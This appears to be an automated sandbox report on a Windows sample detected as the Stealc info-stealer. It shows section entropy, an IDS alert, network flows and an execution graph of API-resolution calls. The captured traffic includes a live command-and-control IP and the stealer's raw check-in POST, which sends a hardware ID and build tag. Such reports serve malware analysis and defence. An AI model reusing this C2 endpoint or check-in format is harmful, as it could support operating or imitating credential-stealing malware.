IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x2e91f8 | 0x8 | .idata
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
(unnamed) | 0x1000 | 0x2e7000 | 0x67600 | 297afaaafbcbc2997a71bd3af66de82d | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc | 0x2e8000 | 0x1000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0x2e9000 | 0x1000 | 0x200 | 049071433b9f7c843453337b0fd53002 | False | 0.1328125 | data | 0.8946074494647072 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
(unnamed) | 0x2ea000 | 0x2a3000 | 0x200 | 7965a81e1cc998daae6eb8ec8d339c45 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
iecwsxsj | 0x58d000 | 0x19f000 | 0x19ec00 | ff0549fa3940268c4db0a59eb1b835a5 | False | 0.9950547911015672 | data | 7.954930403224227 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
qghwgbxt | 0x72c000 | 0x1000 | 0x600 | 9612c378fc3844c42b7093ecddad52b4 | False | 0.5930989583333334 | data | 5.082642887794335 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant | 0x72d000 | 0x3000 | 0x2200 | a5b2b0a546c7be565bd228402746c641 | False | 0.05698529411764706 | DOS executable (COM) | 0.7326727554108926 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
DLL | Import
kernel32.dll | lstrcpy
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-27T21:06:07.833529+0100 | 2044243 | ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in | 1 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 27, 2024 21:06:06.616342068 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 21:06:06.622160912 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 21:06:06.622271061 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 21:06:06.622416973 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 21:06:06.627960920 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 21:06:07.542912960 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 21:06:07.543026924 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 21:06:07.545782089 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 21:06:07.551707983 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 21:06:07.833421946 CET | 80 | 49730 | 185.215.113.206 | 192.168.2.4
Oct 27, 2024 21:06:07.833528996 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
Oct 27, 2024 21:06:09.442795038 CET | 49730 | 80 | 192.168.2.4 | 185.215.113.206
• 185.215.113.206
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.215.113.206 | 80 | 7280 | C:\Users\user\Desktop\file.exe
Timestamp | Bytes transferred | Direction | Data
Oct 27, 2024 21:06:06.622416973 CET | 90 | OUT | GET / HTTP/1.1
                            Host: 185.215.113.206
                            Connection: Keep-Alive
                            Cache-Control: no-cache
Oct 27, 2024 21:06:07.542912960 CET | 203 | IN | HTTP/1.1 200 OK
                            Date: Sun, 27 Oct 2024 20:06:07 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 0
                            Keep-Alive: timeout=5, max=100
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
Oct 27, 2024 21:06:07.545782089 CET | 413 | OUT | POST /6c4adf523b719729.php HTTP/1.1
                            Content-Type: multipart/form-data; boundary=----IDBKFHJEBAAEBGDGDBFB
                            Host: 185.215.113.206
                            Content-Length: 211
                            Connection: Keep-Alive
                            Cache-Control: no-cache
                            Data Raw: 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 39 33 44 45 30 38 32 46 36 34 35 31 33 38 38 39 34 31 30 35 33 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 74 61 6c 65 0d 0a 2d 2d 2d 2d 2d 2d 49 44 42 4b 46 48 4a 45 42 41 41 45 42 47 44 47 44 42 46 42 2d 2d 0d 0a
                            Data Ascii: ------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="hwid"493DE082F6451388941053------IDBKFHJEBAAEBGDGDBFBContent-Disposition: form-data; name="build"tale------IDBKFHJEBAAEBGDGDBFB--
Oct 27, 2024 21:06:07.833421946 CET | 210 | IN | HTTP/1.1 200 OK
                            Date: Sun, 27 Oct 2024 20:06:07 GMT
                            Server: Apache/2.4.41 (Ubuntu)
                            Content-Length: 8
                            Keep-Alive: timeout=5, max=99
                            Connection: Keep-Alive
                            Content-Type: text/html; charset=UTF-8
                            Data Raw: 59 6d 78 76 59 32 73 3d
                            Data Ascii: YmxvY2s=
                            Target ID:0
                            Start time:16:06:02
                            Start date:27/10/2024
                            Path:C:\Users\user\Desktop\file.exe
                            Wow64 process (32bit):true
                            Commandline:"C:\Users\user\Desktop\file.exe"
                            Imagebase:0x4c0000
                            File size:2'137'600 bytes
                            MD5 hash:7E247CE0BFB04EAD4760A9BD841ECE58
                            Has elevated privileges:true
                            Has administrator privileges:true
                            Programmed in:C, C++ or other language
                            Yara matches:
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1729733847.00000000004C1000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1731343295.000000000128E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                            • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1688123808.0000000004EF0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                            Reputation:low
                            Has exited:true
                              Execution Graph

                              Execution Coverage:3%
                              Dynamic/Decrypted Code Coverage:0%
                              Signature Coverage:2.9%
                              Total number of Nodes:1327
                              Total number of Limit Nodes:24
36714->36715 36716 4c2b82 36715->36716 36717 4c4610 2 API calls 36716->36717 36718 4c2b9b 36717->36718 36719 4c4610 2 API calls 36718->36719 36720 4c2bb4 36719->36720 36721 4c4610 2 API calls 36720->36721 36722 4c2bcd 36721->36722 36723 4c4610 2 API calls 36722->36723 36724 4c2be6 36723->36724 36725 4c4610 2 API calls 36724->36725 36726 4c2bff 36725->36726 36727 4c4610 2 API calls 36726->36727 36728 4c2c18 36727->36728 36729 4c4610 2 API calls 36728->36729 36730 4c2c31 36729->36730 36731 4c4610 2 API calls 36730->36731 36732 4c2c4a 36731->36732 36733 4c4610 2 API calls 36732->36733 36734 4c2c63 36733->36734 36735 4c4610 2 API calls 36734->36735 36736 4c2c7c 36735->36736 36737 4c4610 2 API calls 36736->36737 36738 4c2c95 36737->36738 36739 4c4610 2 API calls 36738->36739 36740 4c2cae 36739->36740 36741 4c4610 2 API calls 36740->36741 36742 4c2cc7 36741->36742 36743 4c4610 2 API calls 36742->36743 36744 4c2ce0 36743->36744 36745 4c4610 2 API calls 36744->36745 36746 4c2cf9 36745->36746 36747 4c4610 2 API calls 36746->36747 36748 4c2d12 36747->36748 36749 4c4610 2 API calls 36748->36749 36750 4c2d2b 36749->36750 36751 4c4610 2 API calls 36750->36751 36752 4c2d44 36751->36752 36753 4c4610 2 API calls 36752->36753 36754 4c2d5d 36753->36754 36755 4c4610 2 API calls 36754->36755 36756 4c2d76 36755->36756 36757 4c4610 2 API calls 36756->36757 36758 4c2d8f 36757->36758 36759 4c4610 2 API calls 36758->36759 36760 4c2da8 36759->36760 36761 4c4610 2 API calls 36760->36761 36762 4c2dc1 36761->36762 36763 4c4610 2 API calls 36762->36763 36764 4c2dda 36763->36764 36765 4c4610 2 API calls 36764->36765 36766 4c2df3 36765->36766 36767 4c4610 2 API calls 36766->36767 36768 4c2e0c 36767->36768 36769 4c4610 2 API calls 36768->36769 36770 4c2e25 36769->36770 36771 4c4610 2 API calls 36770->36771 36772 4c2e3e 36771->36772 36773 4c4610 2 API calls 36772->36773 36774 4c2e57 36773->36774 36775 4c4610 2 API calls 36774->36775 36776 4c2e70 36775->36776 36777 4c4610 2 API calls 36776->36777 
36778 4c2e89 36777->36778 36779 4c4610 2 API calls 36778->36779 36780 4c2ea2 36779->36780 36781 4c4610 2 API calls 36780->36781 36782 4c2ebb 36781->36782 36783 4c4610 2 API calls 36782->36783 36784 4c2ed4 36783->36784 36785 4c4610 2 API calls 36784->36785 36786 4c2eed 36785->36786 36787 4c4610 2 API calls 36786->36787 36788 4c2f06 36787->36788 36789 4c4610 2 API calls 36788->36789 36790 4c2f1f 36789->36790 36791 4c4610 2 API calls 36790->36791 36792 4c2f38 36791->36792 36793 4c4610 2 API calls 36792->36793 36794 4c2f51 36793->36794 36795 4c4610 2 API calls 36794->36795 36796 4c2f6a 36795->36796 36797 4c4610 2 API calls 36796->36797 36798 4c2f83 36797->36798 36799 4c4610 2 API calls 36798->36799 36800 4c2f9c 36799->36800 36801 4c4610 2 API calls 36800->36801 36802 4c2fb5 36801->36802 36803 4c4610 2 API calls 36802->36803 36804 4c2fce 36803->36804 36805 4c4610 2 API calls 36804->36805 36806 4c2fe7 36805->36806 36807 4c4610 2 API calls 36806->36807 36808 4c3000 36807->36808 36809 4c4610 2 API calls 36808->36809 36810 4c3019 36809->36810 36811 4c4610 2 API calls 36810->36811 36812 4c3032 36811->36812 36813 4c4610 2 API calls 36812->36813 36814 4c304b 36813->36814 36815 4c4610 2 API calls 36814->36815 36816 4c3064 36815->36816 36817 4c4610 2 API calls 36816->36817 36818 4c307d 36817->36818 36819 4c4610 2 API calls 36818->36819 36820 4c3096 36819->36820 36821 4c4610 2 API calls 36820->36821 36822 4c30af 36821->36822 36823 4c4610 2 API calls 36822->36823 36824 4c30c8 36823->36824 36825 4c4610 2 API calls 36824->36825 36826 4c30e1 36825->36826 36827 4c4610 2 API calls 36826->36827 36828 4c30fa 36827->36828 36829 4c4610 2 API calls 36828->36829 36830 4c3113 36829->36830 36831 4c4610 2 API calls 36830->36831 36832 4c312c 36831->36832 36833 4c4610 2 API calls 36832->36833 36834 4c3145 36833->36834 36835 4c4610 2 API calls 36834->36835 36836 4c315e 36835->36836 36837 4c4610 2 API calls 36836->36837 36838 4c3177 36837->36838 36839 4c4610 2 API calls 36838->36839 36840 4c3190 
36839->36840 36841 4c4610 2 API calls 36840->36841 36842 4c31a9 36841->36842 36843 4c4610 2 API calls 36842->36843 36844 4c31c2 36843->36844 36845 4c4610 2 API calls 36844->36845 36846 4c31db 36845->36846 36847 4c4610 2 API calls 36846->36847 36848 4c31f4 36847->36848 36849 4c4610 2 API calls 36848->36849 36850 4c320d 36849->36850 36851 4c4610 2 API calls 36850->36851 36852 4c3226 36851->36852 36853 4c4610 2 API calls 36852->36853 36854 4c323f 36853->36854 36855 4c4610 2 API calls 36854->36855 36856 4c3258 36855->36856 36857 4c4610 2 API calls 36856->36857 36858 4c3271 36857->36858 36859 4c4610 2 API calls 36858->36859 36860 4c328a 36859->36860 36861 4c4610 2 API calls 36860->36861 36862 4c32a3 36861->36862 36863 4c4610 2 API calls 36862->36863 36864 4c32bc 36863->36864 36865 4c4610 2 API calls 36864->36865 36866 4c32d5 36865->36866 36867 4c4610 2 API calls 36866->36867 36868 4c32ee 36867->36868 36869 4c4610 2 API calls 36868->36869 36870 4c3307 36869->36870 36871 4c4610 2 API calls 36870->36871 36872 4c3320 36871->36872 36873 4c4610 2 API calls 36872->36873 36874 4c3339 36873->36874 36875 4c4610 2 API calls 36874->36875 36876 4c3352 36875->36876 36877 4c4610 2 API calls 36876->36877 36878 4c336b 36877->36878 36879 4c4610 2 API calls 36878->36879 36880 4c3384 36879->36880 36881 4c4610 2 API calls 36880->36881 36882 4c339d 36881->36882 36883 4c4610 2 API calls 36882->36883 36884 4c33b6 36883->36884 36885 4c4610 2 API calls 36884->36885 36886 4c33cf 36885->36886 36887 4c4610 2 API calls 36886->36887 36888 4c33e8 36887->36888 36889 4c4610 2 API calls 36888->36889 36890 4c3401 36889->36890 36891 4c4610 2 API calls 36890->36891 36892 4c341a 36891->36892 36893 4c4610 2 API calls 36892->36893 36894 4c3433 36893->36894 36895 4c4610 2 API calls 36894->36895 36896 4c344c 36895->36896 36897 4c4610 2 API calls 36896->36897 36898 4c3465 36897->36898 36899 4c4610 2 API calls 36898->36899 36900 4c347e 36899->36900 36901 4c4610 2 API calls 36900->36901 36902 4c3497 36901->36902 
36903 4c4610 2 API calls 36902->36903 36904 4c34b0 36903->36904 36905 4c4610 2 API calls 36904->36905 36906 4c34c9 36905->36906 36907 4c4610 2 API calls 36906->36907 36908 4c34e2 36907->36908 36909 4c4610 2 API calls 36908->36909 36910 4c34fb 36909->36910 36911 4c4610 2 API calls 36910->36911 36912 4c3514 36911->36912 36913 4c4610 2 API calls 36912->36913 36914 4c352d 36913->36914 36915 4c4610 2 API calls 36914->36915 36916 4c3546 36915->36916 36917 4c4610 2 API calls 36916->36917 36918 4c355f 36917->36918 36919 4c4610 2 API calls 36918->36919 36920 4c3578 36919->36920 36921 4c4610 2 API calls 36920->36921 36922 4c3591 36921->36922 36923 4c4610 2 API calls 36922->36923 36924 4c35aa 36923->36924 36925 4c4610 2 API calls 36924->36925 36926 4c35c3 36925->36926 36927 4c4610 2 API calls 36926->36927 36928 4c35dc 36927->36928 36929 4c4610 2 API calls 36928->36929 36930 4c35f5 36929->36930 36931 4c4610 2 API calls 36930->36931 36932 4c360e 36931->36932 36933 4c4610 2 API calls 36932->36933 36934 4c3627 36933->36934 36935 4c4610 2 API calls 36934->36935 36936 4c3640 36935->36936 36937 4c4610 2 API calls 36936->36937 36938 4c3659 36937->36938 36939 4c4610 2 API calls 36938->36939 36940 4c3672 36939->36940 36941 4c4610 2 API calls 36940->36941 36942 4c368b 36941->36942 36943 4c4610 2 API calls 36942->36943 36944 4c36a4 36943->36944 36945 4c4610 2 API calls 36944->36945 36946 4c36bd 36945->36946 36947 4c4610 2 API calls 36946->36947 36948 4c36d6 36947->36948 36949 4c4610 2 API calls 36948->36949 36950 4c36ef 36949->36950 36951 4c4610 2 API calls 36950->36951 36952 4c3708 36951->36952 36953 4c4610 2 API calls 36952->36953 36954 4c3721 36953->36954 36955 4c4610 2 API calls 36954->36955 36956 4c373a 36955->36956 36957 4c4610 2 API calls 36956->36957 36958 4c3753 36957->36958 36959 4c4610 2 API calls 36958->36959 36960 4c376c 36959->36960 36961 4c4610 2 API calls 36960->36961 36962 4c3785 36961->36962 36963 4c4610 2 API calls 36962->36963 36964 4c379e 36963->36964 36965 4c4610 2 
API calls 36964->36965 36966 4c37b7 36965->36966 36967 4c4610 2 API calls 36966->36967 36968 4c37d0 36967->36968 36969 4c4610 2 API calls 36968->36969 36970 4c37e9 36969->36970 36971 4c4610 2 API calls 36970->36971 36972 4c3802 36971->36972 36973 4c4610 2 API calls 36972->36973 36974 4c381b 36973->36974 36975 4c4610 2 API calls 36974->36975 36976 4c3834 36975->36976 36977 4c4610 2 API calls 36976->36977 36978 4c384d 36977->36978 36979 4c4610 2 API calls 36978->36979 36980 4c3866 36979->36980 36981 4c4610 2 API calls 36980->36981 36982 4c387f 36981->36982 36983 4c4610 2 API calls 36982->36983 36984 4c3898 36983->36984 36985 4c4610 2 API calls 36984->36985 36986 4c38b1 36985->36986 36987 4c4610 2 API calls 36986->36987 36988 4c38ca 36987->36988 36989 4c4610 2 API calls 36988->36989 36990 4c38e3 36989->36990 36991 4c4610 2 API calls 36990->36991 36992 4c38fc 36991->36992 36993 4c4610 2 API calls 36992->36993 36994 4c3915 36993->36994 36995 4c4610 2 API calls 36994->36995 36996 4c392e 36995->36996 36997 4c4610 2 API calls 36996->36997 36998 4c3947 36997->36998 36999 4c4610 2 API calls 36998->36999 37000 4c3960 36999->37000 37001 4c4610 2 API calls 37000->37001 37002 4c3979 37001->37002 37003 4c4610 2 API calls 37002->37003 37004 4c3992 37003->37004 37005 4c4610 2 API calls 37004->37005 37006 4c39ab 37005->37006 37007 4c4610 2 API calls 37006->37007 37008 4c39c4 37007->37008 37009 4c4610 2 API calls 37008->37009 37010 4c39dd 37009->37010 37011 4c4610 2 API calls 37010->37011 37012 4c39f6 37011->37012 37013 4c4610 2 API calls 37012->37013 37014 4c3a0f 37013->37014 37015 4c4610 2 API calls 37014->37015 37016 4c3a28 37015->37016 37017 4c4610 2 API calls 37016->37017 37018 4c3a41 37017->37018 37019 4c4610 2 API calls 37018->37019 37020 4c3a5a 37019->37020 37021 4c4610 2 API calls 37020->37021 37022 4c3a73 37021->37022 37023 4c4610 2 API calls 37022->37023 37024 4c3a8c 37023->37024 37025 4c4610 2 API calls 37024->37025 37026 4c3aa5 37025->37026 37027 4c4610 2 API calls 
37026->37027 37028 4c3abe 37027->37028 37029 4c4610 2 API calls 37028->37029 37030 4c3ad7 37029->37030 37031 4c4610 2 API calls 37030->37031 37032 4c3af0 37031->37032 37033 4c4610 2 API calls 37032->37033 37034 4c3b09 37033->37034 37035 4c4610 2 API calls 37034->37035 37036 4c3b22 37035->37036 37037 4c4610 2 API calls 37036->37037 37038 4c3b3b 37037->37038 37039 4c4610 2 API calls 37038->37039 37040 4c3b54 37039->37040 37041 4c4610 2 API calls 37040->37041 37042 4c3b6d 37041->37042 37043 4c4610 2 API calls 37042->37043 37044 4c3b86 37043->37044 37045 4c4610 2 API calls 37044->37045 37046 4c3b9f 37045->37046 37047 4c4610 2 API calls 37046->37047 37048 4c3bb8 37047->37048 37049 4c4610 2 API calls 37048->37049 37050 4c3bd1 37049->37050 37051 4c4610 2 API calls 37050->37051 37052 4c3bea 37051->37052 37053 4c4610 2 API calls 37052->37053 37054 4c3c03 37053->37054 37055 4c4610 2 API calls 37054->37055 37056 4c3c1c 37055->37056 37057 4c4610 2 API calls 37056->37057 37058 4c3c35 37057->37058 37059 4c4610 2 API calls 37058->37059 37060 4c3c4e 37059->37060 37061 4c4610 2 API calls 37060->37061 37062 4c3c67 37061->37062 37063 4c4610 2 API calls 37062->37063 37064 4c3c80 37063->37064 37065 4c4610 2 API calls 37064->37065 37066 4c3c99 37065->37066 37067 4c4610 2 API calls 37066->37067 37068 4c3cb2 37067->37068 37069 4c4610 2 API calls 37068->37069 37070 4c3ccb 37069->37070 37071 4c4610 2 API calls 37070->37071 37072 4c3ce4 37071->37072 37073 4c4610 2 API calls 37072->37073 37074 4c3cfd 37073->37074 37075 4c4610 2 API calls 37074->37075 37076 4c3d16 37075->37076 37077 4c4610 2 API calls 37076->37077 37078 4c3d2f 37077->37078 37079 4c4610 2 API calls 37078->37079 37080 4c3d48 37079->37080 37081 4c4610 2 API calls 37080->37081 37082 4c3d61 37081->37082 37083 4c4610 2 API calls 37082->37083 37084 4c3d7a 37083->37084 37085 4c4610 2 API calls 37084->37085 37086 4c3d93 37085->37086 37087 4c4610 2 API calls 37086->37087 37088 4c3dac 37087->37088 37089 4c4610 2 API calls 37088->37089 
37090 4c3dc5 37089->37090 37091 4c4610 2 API calls 37090->37091 37092 4c3dde 37091->37092 37093 4c4610 2 API calls 37092->37093 37094 4c3df7 37093->37094 37095 4c4610 2 API calls 37094->37095 37096 4c3e10 37095->37096 37097 4c4610 2 API calls 37096->37097 37098 4c3e29 37097->37098 37099 4c4610 2 API calls 37098->37099 37100 4c3e42 37099->37100 37101 4c4610 2 API calls 37100->37101 37102 4c3e5b 37101->37102 37103 4c4610 2 API calls 37102->37103 37104 4c3e74 37103->37104 37105 4c4610 2 API calls 37104->37105 37106 4c3e8d 37105->37106 37107 4c4610 2 API calls 37106->37107 37108 4c3ea6 37107->37108 37109 4c4610 2 API calls 37108->37109 37110 4c3ebf 37109->37110 37111 4c4610 2 API calls 37110->37111 37112 4c3ed8 37111->37112 37113 4c4610 2 API calls 37112->37113 37114 4c3ef1 37113->37114 37115 4c4610 2 API calls 37114->37115 37116 4c3f0a 37115->37116 37117 4c4610 2 API calls 37116->37117 37118 4c3f23 37117->37118 37119 4c4610 2 API calls 37118->37119 37120 4c3f3c 37119->37120 37121 4c4610 2 API calls 37120->37121 37122 4c3f55 37121->37122 37123 4c4610 2 API calls 37122->37123 37124 4c3f6e 37123->37124 37125 4c4610 2 API calls 37124->37125 37126 4c3f87 37125->37126 37127 4c4610 2 API calls 37126->37127 37128 4c3fa0 37127->37128 37129 4c4610 2 API calls 37128->37129 37130 4c3fb9 37129->37130 37131 4c4610 2 API calls 37130->37131 37132 4c3fd2 37131->37132 37133 4c4610 2 API calls 37132->37133 37134 4c3feb 37133->37134 37135 4c4610 2 API calls 37134->37135 37136 4c4004 37135->37136 37137 4c4610 2 API calls 37136->37137 37138 4c401d 37137->37138 37139 4c4610 2 API calls 37138->37139 37140 4c4036 37139->37140 37141 4c4610 2 API calls 37140->37141 37142 4c404f 37141->37142 37143 4c4610 2 API calls 37142->37143 37144 4c4068 37143->37144 37145 4c4610 2 API calls 37144->37145 37146 4c4081 37145->37146 37147 4c4610 2 API calls 37146->37147 37148 4c409a 37147->37148 37149 4c4610 2 API calls 37148->37149 37150 4c40b3 37149->37150 37151 4c4610 2 API calls 37150->37151 37152 4c40cc 
37151->37152 37153 4c4610 2 API calls 37152->37153 37154 4c40e5 37153->37154 37155 4c4610 2 API calls 37154->37155 37156 4c40fe 37155->37156 37157 4c4610 2 API calls 37156->37157 37158 4c4117 37157->37158 37159 4c4610 2 API calls 37158->37159 37160 4c4130 37159->37160 37161 4c4610 2 API calls 37160->37161 37162 4c4149 37161->37162 37163 4c4610 2 API calls 37162->37163 37164 4c4162 37163->37164 37165 4c4610 2 API calls 37164->37165 37166 4c417b 37165->37166 37167 4c4610 2 API calls 37166->37167 37168 4c4194 37167->37168 37169 4c4610 2 API calls 37168->37169 37170 4c41ad 37169->37170 37171 4c4610 2 API calls 37170->37171 37172 4c41c6 37171->37172 37173 4c4610 2 API calls 37172->37173 37174 4c41df 37173->37174 37175 4c4610 2 API calls 37174->37175 37176 4c41f8 37175->37176 37177 4c4610 2 API calls 37176->37177 37178 4c4211 37177->37178 37179 4c4610 2 API calls 37178->37179 37180 4c422a 37179->37180 37181 4c4610 2 API calls 37180->37181 37182 4c4243 37181->37182 37183 4c4610 2 API calls 37182->37183 37184 4c425c 37183->37184 37185 4c4610 2 API calls 37184->37185 37186 4c4275 37185->37186 37187 4c4610 2 API calls 37186->37187 37188 4c428e 37187->37188 37189 4c4610 2 API calls 37188->37189 37190 4c42a7 37189->37190 37191 4c4610 2 API calls 37190->37191 37192 4c42c0 37191->37192 37193 4c4610 2 API calls 37192->37193 37194 4c42d9 37193->37194 37195 4c4610 2 API calls 37194->37195 37196 4c42f2 37195->37196 37197 4c4610 2 API calls 37196->37197 37198 4c430b 37197->37198 37199 4c4610 2 API calls 37198->37199 37200 4c4324 37199->37200 37201 4c4610 2 API calls 37200->37201 37202 4c433d 37201->37202 37203 4c4610 2 API calls 37202->37203 37204 4c4356 37203->37204 37205 4c4610 2 API calls 37204->37205 37206 4c436f 37205->37206 37207 4c4610 2 API calls 37206->37207 37208 4c4388 37207->37208 37209 4c4610 2 API calls 37208->37209 37210 4c43a1 37209->37210 37211 4c4610 2 API calls 37210->37211 37212 4c43ba 37211->37212 37213 4c4610 2 API calls 37212->37213 37214 4c43d3 37213->37214 
37215 4c4610 2 API calls 37214->37215 37216 4c43ec 37215->37216 37217 4c4610 2 API calls 37216->37217 37218 4c4405 37217->37218 37219 4c4610 2 API calls 37218->37219 37220 4c441e 37219->37220 37221 4c4610 2 API calls 37220->37221 37222 4c4437 37221->37222 37223 4c4610 2 API calls 37222->37223 37224 4c4450 37223->37224 37225 4c4610 2 API calls 37224->37225 37226 4c4469 37225->37226 37227 4c4610 2 API calls 37226->37227 37228 4c4482 37227->37228 37229 4c4610 2 API calls 37228->37229 37230 4c449b 37229->37230 37231 4c4610 2 API calls 37230->37231 37232 4c44b4 37231->37232 37233 4c4610 2 API calls 37232->37233 37234 4c44cd 37233->37234 37235 4c4610 2 API calls 37234->37235 37236 4c44e6 37235->37236 37237 4c4610 2 API calls 37236->37237 37238 4c44ff 37237->37238 37239 4c4610 2 API calls 37238->37239 37240 4c4518 37239->37240 37241 4c4610 2 API calls 37240->37241 37242 4c4531 37241->37242 37243 4c4610 2 API calls 37242->37243 37244 4c454a 37243->37244 37245 4c4610 2 API calls 37244->37245 37246 4c4563 37245->37246 37247 4c4610 2 API calls 37246->37247 37248 4c457c 37247->37248 37249 4c4610 2 API calls 37248->37249 37250 4c4595 37249->37250 37251 4c4610 2 API calls 37250->37251 37252 4c45ae 37251->37252 37253 4c4610 2 API calls 37252->37253 37254 4c45c7 37253->37254 37255 4c4610 2 API calls 37254->37255 37256 4c45e0 37255->37256 37257 4c4610 2 API calls 37256->37257 37258 4c45f9 37257->37258 37259 4d9f20 37258->37259 37260 4da346 8 API calls 37259->37260 37261 4d9f30 43 API calls 37259->37261 37262 4da3dc GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37260->37262 37263 4da456 37260->37263 37261->37260 37262->37263 37264 4da526 37263->37264 37265 4da463 8 API calls 37263->37265 37266 4da52f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37264->37266 37267 4da5a8 37264->37267 37265->37264 37266->37267 37268 4da5b5 6 API calls 37267->37268 37269 4da647 37267->37269 37268->37269 37270 4da72f 37269->37270 37271 4da654 9 
API calls 37269->37271 37272 4da738 GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37270->37272 37273 4da7b2 37270->37273 37271->37270 37272->37273 37274 4da7ec 37273->37274 37275 4da7bb GetProcAddress GetProcAddress 37273->37275 37276 4da825 37274->37276 37277 4da7f5 GetProcAddress GetProcAddress 37274->37277 37275->37274 37278 4da922 37276->37278 37279 4da832 10 API calls 37276->37279 37277->37276 37280 4da98d 37278->37280 37281 4da92b GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37278->37281 37279->37278 37282 4da9ae 37280->37282 37283 4da996 GetProcAddress 37280->37283 37281->37280 37284 4d5ef3 37282->37284 37285 4da9b7 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 37282->37285 37283->37282 37286 4c1590 37284->37286 37285->37284 37556 4c16b0 37286->37556 37289 4daab0 lstrcpy 37290 4c15b5 37289->37290 37291 4daab0 lstrcpy 37290->37291 37292 4c15c7 37291->37292 37293 4daab0 lstrcpy 37292->37293 37294 4c15d9 37293->37294 37295 4daab0 lstrcpy 37294->37295 37296 4c1663 37295->37296 37297 4d5760 37296->37297 37298 4d5771 37297->37298 37299 4dab30 2 API calls 37298->37299 37300 4d577e 37299->37300 37301 4dab30 2 API calls 37300->37301 37302 4d578b 37301->37302 37303 4dab30 2 API calls 37302->37303 37304 4d5798 37303->37304 37305 4daa50 lstrcpy 37304->37305 37306 4d57a5 37305->37306 37307 4daa50 lstrcpy 37306->37307 37308 4d57b2 37307->37308 37309 4daa50 lstrcpy 37308->37309 37310 4d57bf 37309->37310 37311 4daa50 lstrcpy 37310->37311 37350 4d57cc 37311->37350 37312 